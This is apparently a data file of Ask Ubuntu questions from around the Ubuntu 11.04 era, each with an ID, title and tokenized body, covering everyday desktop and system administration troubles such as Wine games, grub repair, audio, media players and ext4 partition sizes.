48294	bugs when trying to play 'battleswarm : field of honor ' through wine	i am currently attempting to play battleswarm : field of honor through a wine in ubuntu . while the installation was successful , the in-game stuff was riddled with bugs for me , preventing me to play at all . no sound ( occasional volume spikes but then stops later ) . no mouse cursor ( needless to say the cursor in game has vanished ) . unable so see ground , sky , or player models , replaced by useless color ... ( also splits game screen into 4 sections ) . proposed solutions are : install directx 9 through wine and winetricks ( need help installing that ... ) turn off screen graphics ( did nothing ) update to a wine version of 1.3 to fix cursor problem ( currently mine is 1.2 ) now if someone can give me a few pointers , that would be great .
48299	what ides are available for ubuntu ?	this question exists because it has historical significance , but it is not considered a good , on-topic question for this site , so please do not use it as evidence that you can ask similar questions here . see the faq for more information . this is a community wiki for ides available on ubuntu . please post one ide per answer ( including more than just a screenshot or a link , please at least put a short description ) . in your answer , tell us what the ide is for ( which language ( s ) or if it is rad capable ) .
48300	issue installing midori	i 've downloaded midori , and am attempting to build and install . according to the install instructions , i need to do this : make sure you have python 2.4 or higher installed . change to the midori folder on your hard disk in a terminal . run './waf configure' run './waf build' you can now run midori from the build folder like so './waf build -- run' using -- run as shown above will make sure extensions as well as localizations are used from the build folder . you can install it with './waf install' when i run configure , though , i get the following : esther @ esther-linux : ~/midori-0.3.6 $ ./waf configure checking for program gcc or cc : /usr/bin/gcc checking for program cpp : /usr/bin/cpp checking for program ar : /usr/bin/ar checking for program ranlib : /usr/bin/ranlib checking for gcc : ok checking for program valac : not found vala is required for some extensions . pass -- disable-vala to not build with vala . the instructions do n't mention anything about vala ; what is it and where can i get it ?
48303	how can i clean up `/var/lib/dpkg/status` ?	my system constantly complains about errors in my dpkg status file , and nothing i have tried from the internet seems to work . i could fix it manually- if i could get the file to load in under an hour . for example : dpkg-query : warning : parsing file '/var/lib/dpkg/status ' near line 116506 package 'virtualbox-3.1 ' : error in version string '3.1.2-56127_ubuntu_karmic ' : invalid character in revision number is there some command i can run to get dpkg to stop complaining about packages i removed two years ago ? update : geany loads it fine , now i need someone to tell me what to remove/change to get rid of these obnoxious messages : ) .
48317	trust ssh server based on key instead of if key+ip match	is it possible to make the ssh client not care what ip a ssh server is behind ( and if a different server was behind that ip earlier ) but instead trust specific server keys ? ( and maybe nickname those keys ? ) i use dynamic dns and i have ipv6 privacy extensions enabled on some computers and am always getting asked if it think it 's safe to connect . another possibility is addresses assigned by dhcp getting assigned to different ssh servers and causing all sorts of 'key does n't match ip ' errors .
48319	how to enable remote desktop from remote ?	most of the times after installing ubuntu , we forget to enable remote desktop . how ever we have installed ssh in all the ubuntu systems . is it possible to enable remote desktop remotely ? it will be helpful for us if it is possible.. i hope someone will write a possible solution , thanks in advance..
48320	how to get alert when the system goes down ?	we would like to monitor few servers , like if the server goes down i should get a pop-up instantly without fail . i know it is possible , but i have no idea on how to setup it . it will be so kind if someone helps me to setup it . thanks in advance..
48321	how do i start applications automatically on login ?	how can i make an application automatically start when i have logged in ?
48322	any reason ubuntu software center does not accept paypal ?	recently the game braid was released for ubuntu in the ubuntu software center . however , it seems they do n't take payments from paypal yet . is there a political reason for this , or a technical one ?
48331	how do i encrypt ext4 home folder partition ?	edit : its not a duplicate . `` how do i encrypt my home partition ? '' is old and does not mention anything about ext4 . i have installed ubuntu 11.04 . at the time of installation i did not encrypted my home partition , but now i feel the need of it . how do i encrypt my home partition ? please note , i have ext4 file system . once encrypted will i be able to recover my data in case of os crash ( which occures very rarely ) ?
48332	how to blacklist a pci device so a system can boot ?	i installed ubuntu 10.10 on someone 's computer which it had a 'connexant fusion 878a ' pci card installed , the card is problematic , i had to unplug it just to use the live cd . now my question is how to know which module to blacklist , so he can use the card in windows and override it when he boots into ubuntu . there 's a twist , i ca n't plug it and lsmod it because it wo n't let the system boot up even in 'recovery mode ' . kernel : 2.6.35-22
48333	how do i resize my home partition ( ext4 ) on runtime ?	i am using ubuntu 11.04 . i have installed gparted . i wanted to resize my home folder cuz its low in free space but gparted wont allow me to resize root and home folder , alothough i can resize other partitions . is there any way around to resize during runtime or do i have to use live cd for that ?
48336	how to install firefox 3.5 side-by-side to default firefox 4 ?	my online banking requires firefox 3.5 instead of the default firefox 4 that comes with ubuntu 11.04 . how can i install version 3.5 to be able to have it running side-by-side to firefox 4 ?
48337	how can i use both intel onboard and nvidia graphics at the same time ?	how can i use both intel onboard graphic chip and nvidia card at the same time ? i googled a little and lots of people said i need sli or crossfire support for both of my cards , but i managed to do so in win 7 so i guess it could be done in ubuntu . here 's some information of my computer , any help ? *-display description : vga compatible controller product : g94 [ geforce 9600 gt ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : fa000000-faffffff memory : c0000000-cfffffff memory : f8000000-f9ffffff ioport : af00 ( size=128 ) memory : fb000000-fb07ffff *-display description : display controller product : 82g33/g31 express integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 10 width : 32 bits clock : 33mhz capabilities : msi pm bus_master cap_list configuration : driver=i915 latency=0 resources : irq:43 memory : fdf00000-fdf7ffff ioport : ff00 ( size=8 ) memory : d0000000-dfffffff memory : fdc00000-fdcfffff
48343	login in to the classic mode still runs unity	yeah yeah i know i should log out and select ubuntu classic when i want to log back in but that does n't work ! i can still see the unity launcher and none of my applets work ! ! ! what is the problem here ?
48353	how to show just a progress bar during a preseeded installation ?	based on the comment on a question on superuser.com , i started wondering if it 's possible to show a progress bar with no text during an installation . that could be used to provide a user-friendly installation for computer illiterate for which a few lines can be very confusing .
48354	mount network drive	since i updated my ubuntu to natty narwhal ( from 10.04 ) , my mount script does n't work anymore . the scripts mounts a folder from a nas ( wd mybookworld ) in the local network to a folder in my home folder . script looked like that : # ! /bin/bash sudo mount //192.168.2.222/public/shared\ music/ /home/simon/musik/ error : mount : wrong fs type , bad option , bad superblock on //192.168.2.222/public/shared music/ , missing codepage or helper program , or other error ( for several filesystems ( e.g . nfs , cifs ) you might need a /sbin/mount. < type > helper program ) manchmal liefert das syslog wertvolle informationen â versuchen sie dmesg | tail oder so now , because the script does n't work anymore i decided to add the mount-process to my fstab , because the network drive should be mounted on every startup . my fstab entry looks like this : //192.168.2.222/public/shared\ music/ /home/simon/musik cifs credentials=/home/simon/.smbcredentials 0 0 but it does n't work , too . i get a message during the startup process , that musik could n't be mounted . are there any log files i can check for errors ? the system is a fresh installed 11.04 . greetings
48356	`` no root filesystem is defined '' while installing ubuntu	i have just got a new laptop , it is running windows 7 home premium . i have shrunk the windows partition to give me some empty space and now i want to install ubuntu . from windows my partitions look like : so now in the ubuntu live cd if i hit install and go manual the partitioner looks like so i thought i could just select the empty space and be away laughing , but when i hit it i get
48362	how to enable mod_rewrite in apache ?	i just installed the lamp stack on my ubuntu system . the redirection is not working for me . i do n't know how to fix it . can anyone help me ?
48368	frozen pointer with either gnome or unity a few seconds after login	hello to everyone reading . since upgrading a box from maverick to natty yesterday i get an incomprehensible problem with the pointer when choosing either gnome or unity as dm/wm . namely the pointer freezes up after a few seconds after login . after a bit of debug i was able to pinpoint the problem down to the gnome-settings-daemon process . basically , killing it restores mouse functionality . btw by mouse i mean touchpad , the synaptics touchpad embedded in the laptop , which reports to be active all the while through inquiries by synclient . i tried to disable any assistive feature , such as the pointer locator , or any other touchpad-disabling setting among those sported in the settings of gnome , to no avail . the graphic card is an intel , and both ~/.xsession-errors or dmesg do not appear to offer obvious references to such bizarre behaviour . as you can probably infer from what i 've written , no problem appears when the graphical session employs other wms , such as fluxbox for instance . thank you for any insights you might send my way .
48369	nvidia coolbits settings do n't work when i click the checkbox	i have enabled coolbits on my system . i am running ubuntu 11.04 with unity 2d . when i open nvidia x server settings i have clock frequencies as i should . when i click enable clock frequencies i get the read and accept page . after scrolling to the bottom the yes check box lights up . but when i click yes the whole lot dissapears and i can not make any clock settings . if i open nvidia x server settings i am back to square one . i have never had this problem on any other linux ( or windows ) distro . help !
48371	how do i configure a fingerprint scanner ?	i have a hp dv6-3079tx . one feature i like about it is the fingerprint scanner , is there a utility out there that will allow me to swipe my finger whenever i am required to enter my password ?
48372	how do i stop windows from maximizing when dragged into a corner ?	how do i stop windows from maximizing when dragging them into a corner ? i 'm guessing this is a compiz feature but i 'm not finding it in ccsm . i 've turned off unity so it should n't be that . i 'm running natty .
48376	how can i make eclipse work ( bash permission ) ?	well , i 've tried to compile and install eclipse 3.6.2 using the instructions in : how to update eclipse 3.5.2 to 3.6.2 ? . but eclipse does n't open . user @ s-hp-550 : ~ $ eclipse bash : /usr/bin/eclipse : permission denied edit : user @ s-hp-550 : ~ $ ls -l /usr/bin/eclipse -rw-r -- r -- 1 root root 70 2011-06-12 18:15 /usr/bin/eclipse user @ s-hp-550 : ~ $ file /usr/bin/eclipse /usr/bin/eclipse : posix shell script text executable
48378	mobile broadband slow to be detected	-- update 1 : relevant syslog lines . -- update 2 : a step further . i was able to solve the gsm modem enable failed : ( 32 ) sim pin required loop specifying the pin in network manager > edit connections ... > mobile broadband > edit > mobile broadband > pin . original question i 'm facing a pretty annoying issue with a multimode gprs/edge/umts/hsdpa usb internet key i use for internet access , product onda wcdma technologies msm . os is ubuntu natty 11.04 64-bit . the application asking me to enter the pin starts only after some minutes the key is plugged in ; time varies from immediately to 5 minutes and more . i try to trigger the recognition killing network manager applet nm-applet and restarting it , but i 'm not sure it helps . i also see there is an utility called /usr/bin/modem-manager but i 'm not able to run it ( provided it could be useful , as man modem-manager gives nothing ) . i 'd like the key to be detected as soon as i plug it in , do you have any hint ? i hate to say so but on windows it takes only few seconds and the dongle is recognized ( using product manufacturer dial in software ) . thanks
48382	how to use tortoisehg in nautilus ?	i 'm used to tortoisehg on windows . i tried apt-get install tortoisehg tortoisehg-nautilus but after the installation i still ca n't use it by typing tortoisehg in the terminal or in the launcher , nor can i right click in a folder and see it in the context menu . what mercurial gui works with unity ? if tortoisehg does , how to use it ?
48385	how to make keepass2 work correctly in the unity launcher ?	keepass2 is a mono app . in the launcher it appears as `` untitled window '' and has a grey icon with a question mark . when i `` keep in launcher '' the icon does n't launch the application how to fix that ?
48390	grub-install from live cd ( urgent )	i have removed mbr by mistake . now i ca n't boot ubuntu , so i want to reinstall grub . i 'm following this instructions . the problem is that i 'm getting this error : grub-install -- boot-directory=/media/cab64688-2d97-4bbd-9f32-7bc0badb40a8/boot /dev/sdb rm : can not remove `/media/cab64688-2d97-4bbd-9f32-7bc0badb40a8/boot/grub/915resolution.mod ' : read-only file system so , problem is that my existing ubuntu partition is mounted read only . when i try : sudo mount /dev/sdb7 /media/ubuntu_mpt mount : block device /dev/sdb7 is write-protected , mounting read-only so i failed to install grub since i 'm in read only mode . any idea ? thanks in advance . edit : after apt-get install grub , i repeated the process and got : probing devices to guess bios drives . this may take a long time . unknown partition table signature sed : ca n't read /media/cab64688-2d97-4bbd-9f32-7bc0badb40a8_/boot/grub/device.map : no such file or directory grep : /media/cab64688-2d97-4bbd-9f32-7bc0badb40a8_/boot/grub/device.map : no such file or directory /dev/sda does not have any corresponding bios drive . edit : requested outputs : fdisk -l disk /dev/sda : 163.9 gb , 163927522816 bytes 255 heads , 63 sectors/track , 19929 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sda does n't contain a valid partition table disk /dev/sdb : 640.1 gb , 640133946880 bytes 255 heads , 63 sectors/track , 77825 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x3dcf5202 device boot start end blocks id system /dev/sdb1 * 1 3917 31463271 7 hpfs/ntfs /dev/sdb2 3918 77826 593667163 f w95 ext 'd ( lba ) /dev/sdb5 3918 43080 314576766 7 hpfs/ntfs /dev/sdb6 77328 77826 4000768 82 linux swap / solaris /dev/sdb7 43081 77197 274041856 83 linux /dev/sdb8 77197 77327 1045504 82 linux swap / solaris partition table entries are not in disk order disk /dev/sdc : 4043 mb , 4043284480 bytes 125 heads , 62 sectors/track , 1018 cylinders units = cylinders of 7750 * 512 = 3968000 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6f20736b this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/sdc1 ? 100405 247697 570754815+ 72 unknown partition 1 has different physical/logical beginnings ( non-linux ? ) : phys= ( 357 , 116 , 40 ) logical= ( 100404 , 79 , 11 ) partition 1 has different physical/logical endings : phys= ( 357 , 32 , 45 ) logical= ( 247696 , 24 , 51 ) partition 1 does not end on cylinder boundary . /dev/sdc2 ? 21767 271577 968014120 65 novell netware 386 partition 2 has different physical/logical beginnings ( non-linux ? ) : phys= ( 288 , 115 , 43 ) logical= ( 21766 , 48 , 47 ) partition 2 has different physical/logical endings : phys= ( 367 , 114 , 50 ) logical= ( 271576 , 60 , 42 ) partition 2 does not end on cylinder boundary . /dev/sdc3 ? 241276 491086 968014096 79 unknown partition 3 has different physical/logical beginnings ( non-linux ? ) : phys= ( 366 , 32 , 33 ) logical= ( 241275 , 3 , 30 ) partition 3 has different physical/logical endings : phys= ( 357 , 32 , 43 ) logical= ( 491085 , 14 , 39 ) partition 3 does not end on cylinder boundary . /dev/sdc4 ? 372346 372354 27749+ d unknown partition 4 has different physical/logical beginnings ( non-linux ? ) : phys= ( 372 , 97 , 50 ) logical= ( 372345 , 119 , 25 ) partition 4 has different physical/logical endings : phys= ( 0 , 10 , 0 ) logical= ( 372353 , 14 , 33 ) partition 4 does not end on cylinder boundary . partition table entries are not in disk order mount aufs on / type aufs ( rw ) none on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) /dev/sr0 on /cdrom type iso9660 ( ro , noatime ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/ubuntu/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=ubuntu ) /dev/sda on /media/backup type ext4 ( rw , nosuid , nodev , uhelper=udisks ) /dev/sdb7 on /media/cab64688-2d97-4bbd-9f32-7bc0badb40a8_ type ext4 ( ro , nosuid , nodev , uhelper=udisks ) ls -la /dev/disk/by-label total 0 lrwxrwxrwx 1 root root 9 2011-06-12 18:32 backup - > ../../sda lrwxrwxrwx 1 root root 9 2011-06-12 18:31 ubuntu\x2011.04\x20i386 - > ../../sr0
48391	keyboard `` kid lock '' software	is there an application for ubuntu , that would behave like kidkeylock for windows ? that is , upon activation , it prevents any keypress from working , until a specific sequence ( `` password '' ) is typed , but without locking the screen or mouse . the point of this is to allow a kid ( baby/toddler ) to pound away on the keyboard , but leaving the the screen open and mouse activity unlocked , allowing the parent to browse faceb askub very important parenting information sites at the same time . related : if there are no such applications , any idea how difficult would it be to code one with python ? ( if this is the case , i will of course ask further from stackoverflow ... )
48393	how to make the keyboard media keys to work with vlc globally ?	my keyboard has media keys and they work globally on unity with banshee but do n't with vlc when another app is focused . how to fix that ?
48394	how to make banshee to play aac audio streams ?	i have played mp3 radio with banshee but i had to use vlc to play aac streams . how to make it work with banshee ?
48397	how to open radio playlists in the banshee music player ?	i have some pls files with the content in the following format [ playlist ] numberofentries=1 file1=http : //72.26.204.32:80/club ? someuserid title1=club sounds length1=-1 version=2 it works well on vlc media player , but when i try to open it banshee nothing happens ( excepting opening banshee ) . will banshee understand this file if properly configured ? ps : i know how to add radio stations manually to banshee . that 's not what i want .
48400	how do i make my sansa view connect to banshee via mtp ?	i have a sansa view , and am running ubuntu 10.10 ( will be upgrading shortly ) . i have just tried to use banshee to manage my music . however , there is a problem . when i connect my sansa in usb mode , there are no issues . however , when i use mtp mode , banshee does n't see the device , even though rhythmbox worked perfectly . the mtp plugin in banshee is enabled . also , mtp-detect can see the device . this is probably a banshee problem . does anyone have a solution i can use ?
48405	hows to set skype shortcut for opening existing instance ?	i 'm using linux for about two years now , but due to my windows legacy i like keeping shortcuts on my desktop instead of dockies , panel shortcuts , etc . if skype is already running , pressing the shortcut starts a new sequence rather than opening an existing one . this is kinda cool as you can have two accounts running . but i only have one . so , my question is whether it is possible to tweak skype into opening an already existent instance when pressing the shortcut ?
48406	inverted surround channels	i 'm encountering an issue with surround sound on ubuntu 11.04 . i managed to play sound trough hdmi but the channels are inverted . for example when pulse audio plays on the center speaker , it goes through my lfe . same thing on the speaker test included in the sound preferences channel . while searching topics about this issue i tried editing /etc/pulse/daemon.conf by changing the channel-map setting - to no avail . maybe i didnt use it correctly ? any idea to swap those channels and have my 5.1 working correctly ? system specs : ubuntu 11.04 asrock aion330 hdmi amp thanks in advance ! aplay -l gives this result : default playback/recording through the pulseaudio sound server pulse playback/recording through the pulseaudio sound server front : card=nvidia , dev=0 hda nvidia , vt1708s analog front speakers surround40 : card=nvidia , dev=0 hda nvidia , vt1708s analog 4.0 surround output to front and rear speakers surround41 : card=nvidia , dev=0 hda nvidia , vt1708s analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=nvidia , dev=0 hda nvidia , vt1708s analog 5.0 surround output to front , center and rear speakers surround51 : card=nvidia , dev=0 hda nvidia , vt1708s analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=nvidia , dev=0 hda nvidia , vt1708s analog 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=nvidia , dev=0 hda nvidia , vt1708s digital iec958 ( s/pdif ) digital audio output hdmi : card=nvidia , dev=0 hda nvidia , hdmi 0 hdmi audio output dmix : card=nvidia , dev=0 hda nvidia , vt1708s analog direct sample mixing device dmix : card=nvidia , dev=1 hda nvidia , vt1708s digital direct sample mixing device dmix : card=nvidia , dev=3 hda nvidia , hdmi 0 direct sample mixing device dsnoop : card=nvidia , dev=0 hda nvidia , vt1708s analog direct sample snooping device dsnoop : card=nvidia , dev=1 hda nvidia , vt1708s digital direct sample snooping device dsnoop : card=nvidia , dev=3 hda nvidia , hdmi 0 direct sample snooping device hw : card=nvidia , dev=0 hda nvidia , vt1708s analog direct hardware device without any conversions hw : card=nvidia , dev=1 hda nvidia , vt1708s digital direct hardware device without any conversions hw : card=nvidia , dev=3 hda nvidia , hdmi 0 direct hardware device without any conversions plughw : card=nvidia , dev=0 hda nvidia , vt1708s analog hardware device with all software conversions plughw : card=nvidia , dev=1 hda nvidia , vt1708s digital hardware device with all software conversions plughw : card=nvidia , dev=3 hda nvidia , hdmi 0 hardware device with all software conversions gnome-volume-control is indeed set to digital surround 5.1 hdmi output . the speaker test is affected by the channels issue , though .
48408	why is claws mail displaying sent mail in an editor window ?	why is claws mail displaying sent mail in an editor window ? i do n't want to change any sent mail . maybe this is a small thing only but still annoying .
48410	how to install dhcpd3 ?	as i recall , there used to be this dhcp server called dhcpd3 however , under ubuntu , i am not entirely sure where to obtain or how to install it . the following command does n't seem to locate the package . apt-get install dhcpd3 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package dhcpd3 has dhcpd3 been deprecated and replaced by something else ? thank you in advance !
48416	how can i resume a download started in chromium ?	i was in the middle of a large download in chromium and the power supply to my computer failed ( well i tripped over my power cord ... ) . i see the entry in chrome : //downloads/ which says the download was cancelled . there is a link to the file called `` retry download '' but i would rather not start the download from scratch because i have limited downloads . how can i resume this download ?
48423	how to create a ppa that just contains links to other ppas ?	so that i just have to maintain one ppa on maybe launchpad and have all the packages i like . update : nifty workarounds are welcome , too ; ) update : i 'm running a server here at home . so if there is a solution where i can set up my own private repo , that would be totally fine .
48424	how to either configure , or completely remove policykit ?	where can someone get policykit related tools ? gnome-policykit-authorizations polkit-config-file-validate polkit-policy-file-validate and if getting them is not an option : where can i get a full gui configuration tool for this system ? this is a gui-related policy/authorization system as far as i can understand it , there must be a gui configuration interface somewhere correct ? either that , or : how can someone completely get rid of polkit/policykit ? is that even possible ? will apps that do support policies see that it 's gone and rely on sudo/gksu/group : admin/something else ? it 's a pain and i 'm having a terrible experience with any gnome administration/configuration programs that use the policy system . they have problems even when run as root ! am i alone in having a huge headache in trying to figure out how to fix the default ( broken ) policies ? as far as i can see it has been configured to work fine when you 're using a gui session ( ie gnome ) while sitting in front of a real monitor , keyboard , mouse ; but other than that , it all breaks down . this question is related to this one . and one final question : do all ubuntu versions/other linux distros that have policykit installed have the same problems ? i 'd imagine not ; ie . does 10.04lts have these problems ? or debian ? or something else entirely ? it 's the 4th day i 've been fighting with this , and there 's no end in sight . any help would be appreciated
48425	how does wubi work ?	how does the wubi installer work ? which partition does it install ubuntu on ? if it 's on the windows partition , where is it in the filesystem ?
48430	how can i connect a wiimote to my computer to control an audio-player ?	i want to connect a wiimote . i 'm running natty and would like to control an audio-player with my wiimote . is that possible ?
48433	how to install postler ( from elementary )	when i try to install postler from the elementary os web page ( first by adding the repository and running apt-get update , then clicking `` install , '' the software center opens , then displays a `` not found '' error . the package is also not found when searching for it in the software center or by installing it from the command line . is there something i am missing ? dexter installed just fine , and i 've tried postler on the elementary live image , and i like it better than thunderbird , so i 'd like to use it . i 'm running ubuntu 11.04 with unity , though unity should n't affect it .
48434	what does a composite-manager do ?	i know it 's used for true transparancy , but what else is it good for ?
48436	how to scp a file from mac - > ubuntu virtualbox ?	i have a mac ( os x ) and a virtualbox running ubuntu . i want to scp a 500mb file from the mac to the virtualbox . how do i do this ? ( probably something to do with /etc/hosts ? )
48441	how to make changes to launcher in unity permanent ?	i spent now a couple of hours reading and trying . i went through the whole faq here , but could n't find any help for my problem . i 'm running ubuntu 11.04 for a few days , now . whenever i add or remove something to the launcher - drag and drop a .desktop file or by clicking on `` keep in launcher '' to remove the tick - the next time i log in all these changes are gone ! config for unity always resets to the default on every log-in .
48444	will ubuntu one support os settings sync ?	being new to linux and to ubuntu , i 've taken quite some time to tune it to my needs on my netbook . as i 'm now convinced by the os , i plan to install it on my desktop in the next few days . i was hoping that with ubuntu one , after a sync , i would find back all my settings on the newly installed machine : system settings , language , list of installed programs ( to quickly reinstall the same set ) , email chat and microblog accounts , unity launcher shortcuts , etc ... i 've just read trought the ubuntu one website and it seems such a settings-sync feature is not part of it . is this something that could be done ? is it planned ? is there another way to achieve this same effect ? thanks in advance for any infos on that .
48446	how to make permanent change to .config/user-dirs.dirs ?	each time i changed and saved .config/user-dirs.dirs , and after restarted the system , the xdg_download_dir are reverted : diff -- git a/.config/user-dirs.dirs b/.config/user-dirs.dirs index 8f6e2db..dcff34e 100644 -- - a/.config/user-dirs.dirs +++ b/.config/user-dirs.dirs @ @ -7,11 +7,9 @ @ # xdg_publicshare_dir= '' $ home/public '' xdg_templates_dir= '' $ home/public/template '' - xdg_desktop_dir= '' $ home/private/desktop '' xdg_documents_dir= '' $ home/private/doc '' xdg_pictures_dir= '' $ home/private/picture '' xdg_music_dir= '' $ home/private/music '' xdg_videos_dir= '' $ home/private/video '' - -xdg_download_dir= '' $ home/var/downloads '' +xdg_download_dir= '' $ home/ '' how to make my changes permanent ?
48449	usb gamepad controller for minecraft ?	logitech gamepad controller works in ubuntu 11.04 but does not work with minecraft . i have tried minecontrol which supports windows/mac/linux and is used to make minecraft compatible with a usb controller however , it can not locate the usb controller . any suggestions ?
48450	how do i replace pulseaudio ?	previous answers refer to previous versions of ubuntu . i 'm having the same issues and dislikes with pulseaudio in natty as i had with previous versions of ubuntu , so i want to replace it with something else . i 'm looking for references to step-by-step instructions by someone that succeeded in the replacement . alsa or oss are fine . i do n't care about the loss of integration , because it can be patched . i just want the ( for me ) ill-behaved pulseaudio out of my system .
48452	how can i change firefox switching tabs shortcuts ?	i was used to press control+1 , control+2 and so on to switch between tabs in firefox . now , in unity , i have to use the alt key instead . how can i change that ? thanks !
48453	dpkg : error processing ttf-droid ( -- remove )	i have been installing various applications on my ubuntu 10.10 laptop and i 've been noticing a common theme . there is always an error in the terminal at the end of the install and it is as follows : removing ttf-droid ... /etc/defoma/hints/ttf-droid.hints : unable to open , or empty . dpkg : error processing ttf-droid ( -- remove ) : subprocess installed pre-removal script returned error exit status 1 errors were encountered while processing : ttf-droid e : sub-process /usr/bin/dpkg returned an error code ( 1 )
48456	ubuntu classic does not work	i do n't know what i did that caused this , but when i log in to either ubuntu classic or ubuntu classic ( no effects ) , the screen displays the wallpaper , but nothing else . the mouse still works and the screen is n't frozen or anything . the terminal can still be accessed with ctrl+alt+t . each time , i have had to logout from the terminal and log on back into the regular ubuntu with unity , which still works . update i logged back into classic today and now there 's the unity interface instead of classic . hmmmm ...
48458	problem using any docks ( cairo , awn , docky )	i installed cairo dock in 11.04 , but i can not add any shortcuts to the cairo bar . before that i installed awn and docky and i had the same problem . any solution ?
48459	add a repository , but hold updates of an individual package	i am adding the elementary-desktop ppa ( https : //launchpad.net/~elementaryart/+archive/elementarydesktop ) because it keeps track of the latest updates for several applications i use . however , i do not want nautilus to be upgraded to the elementary-desktop 's version . i understand that i can use dpkg or aptitude to `` hold '' updates to nautilus , but will that also hold updates from ubuntu 's repositories ? i 'm looking for an ideal solution that would give me updates from ubuntu 's repository , but ignore updates from elementary-desktop .
48460	how to assign shortcut keys in gnome ?	my laptop has several buttons on the very left , calculator , unknown , web browser , unknown , mail . i know these work as the calculator , mail , and web browser buttons work , i want to map the other two buttons , the first unknown i wish to map to `` open nautilus '' , the second one i wish to map to `` open terminal '' how can i do this ?
48465	guide or book for ubuntu server	is there any detailed guide or book for ubuntu server ? for installation and administration . free or commercial .
48468	how do i install java ?	how do i install java and also in my browser so websites with java work ?
48471	how can i `cat` a file as an attachment on a new thunderbird email message from the command line ?	as it says on the tin really . i would like to send some of my etc files to a colleague and it would be handy to cat them to a new thunderbird email message . is this possible ? if so how ?
48475	why does n't ctrl + f5 work in firefox ?	i 'm using xubuntu 11.04 , and with a windows xp in my virtualbox . both have latest firefox 4 installed . but inside my ubuntu , ctrl+f5 never works , and because i do n't know what else i could do to force refreshing a page , i have to copy the link and paste them into my windows xp to get the newest results . is there a way that i could solve this ? thank you very much if this problem could get a solution . edit : even though ctrl+f5 does n't work , i just found it can also be triggered by ctrl+shift+r too . full shortcuts reference here .
48483	try out ubuntu on thinkpad x40 ( via usb ) ?	i am trying to try out ubuntu ( i , e , install it within windows ) on my thinkpad x40 . i followed the instructions on how to create a bootable usb ( http : //www.ubuntu.com/download/ubuntu/download ) . no problem . the issue i have now is that th eusb ports on my x40 were burned before ( common problem with the machine ) , i.e . do not work . so i got a usb notebook card from belkin . however it does not seem to recognize the usb stick from bios , thus i can not boot from it . i also do not have a cd rom . then tried to run wubi from the usb stick , briefly appears in task manager , no further action . so i tried it with wubi.exe , but same thing . downloaded it to desktop , run it , briefly appears in the task manager under processes , no further action . any one idea ? i have enough memory and enough freed hd space . thanks . oliver
48488	ext4 partition size / free space discrepancies	while creating a 250gib backup partition for my data , i have noticed lots of discrepancies between reported partition size and free space in nautilus , gparted , df , tune2fs , etc . at first i thought it was a gib / gb confusion . it was not . then i thought it could be ext4 's reserved blocks . it was not . im completely puzzled . here are some images . here are the steps : first , ntfs . 524288000 sectors x 512 bytes/sector = 268435456000 bytes = 268.4 gb = 250 gib . nautilus say `` total capacity : 250.0 gb '' ( even though its actually gib , not gb ) . apart from that minor mislabeling , so far , so good now , same partition , formated as ext4 with gparted : first , last and total sectors are the same . it is the same 250gib partition . used size is 4.11gib ( reserved blocks maybe ? ) nope . looks like reserved blocks are 12.7 gib ( ~5 % . ouch ! ) . but ... why total capacity is now only 246.1 gib ? ? ? . that difference ( sort of ) matches the 4.11 gib reported by gparted . but ... if its not from reserved blocks , what is it ? and why gparted didnt report that 12.7gib of used space ? $ df -h /dev/sda5 filesystem size used avail use % mounted on /dev/sda5 247g 188m 234g 1 % /media/backup df matches nautilus in reported free space . but.. only 188m used ? shouldnt it be ~12gb ? and total capacity is still wrong . so i ran tune2fs to find some clues . ( irrelevant output is ommited ) $ sudo tune2fs -l /dev/sda5 tune2fs 1.41.12 ( 17-may-2010 ) filesystem volume name : backup filesystem uuid : 613d592e-47f5-4206-96a7-210090d340ef filesystem features : has_journal ext_attr resize_inode dir_index filetype extent flex_bg sparse_super large_file huge_file uninit_bg dir_nlink extra_isize filesystem flags : signed_directory_hash filesystem state : clean filesystem os type : linux block count : 65536000 reserved block count : 3276800 free blocks : 64459851 first block : 0 block size : 4096 65536000 total blocks * 4096 bytes/block = 268435456000 bytes = 268.4 gb = 250 gib . it matches gparted . 3276800 reserved blocks = 13421772800 bytes = 13.4 gb = 12.5 gib . it ( again , sort of ) matches nautilus . 64459851 free blocks = 264027549696 bytes = 264.0 gb = 245.9 gib . why ? shouldnt it be either 250-12.5 = 237.5 ( or 250- ( 12.5+4.11 ) =~233 ) ? removing reserved blocks : $ sudo tune2fs -m 0 /dev/sda5 tune2fs 1.41.12 ( 17-may-2010 ) setting reserved blocks percentage to 0 % ( 0 blocks ) $ sudo tune2fs -l /dev/sda5 tune2fs 1.41.12 ( 17-may-2010 ) filesystem volume name : backup filesystem uuid : 613d592e-47f5-4206-96a7-210090d340ef filesystem features : has_journal ext_attr resize_inode dir_index filetype extent flex_bg 